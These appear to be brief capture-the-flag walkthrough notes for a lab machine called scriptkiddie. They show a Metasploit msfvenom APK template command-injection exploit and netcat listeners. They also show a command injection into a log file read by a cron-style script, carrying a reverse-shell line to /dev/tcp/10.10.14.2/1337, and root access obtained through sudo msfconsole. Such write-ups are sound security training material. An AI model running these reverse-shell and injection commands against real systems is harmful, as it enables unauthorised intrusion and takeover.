2 :5000
Looking at for quite some time, its definitely some kind of file upload vuln. file uploaded needs be some kind of template.
https://www.exploit-db.com/exploits/49491
$ msfconsole -q; use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
# generate apk file and upload
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 50078
whoami
kid
cd /home
ls -la
ls -la
total 16
drwxr-xr-x 4 root root 4096 Feb 3 07:40 .
drwxr-xr-x 20 root root 4096 Feb 3 07:40 ..
drwxr-xr-x 11 kid kid 4096 Feb 3 11:49 kid
drwxr-xr-x 6 pwn pwn 4096 Feb 3 12:06 pwn
cd pwn
cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
kid@scriptkiddie:/home/pwn$ echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1' #" >> /home/kid/logs/hackers
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.226] 44962
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
pwn
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwn may run the following commands on scriptkiddie:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsolem
sudo msfconsole -q
/bin/bash
stty: 'standard input': Inappropriate ioctl for device
[*] exec: /bin/bash
whoami
root
Last updated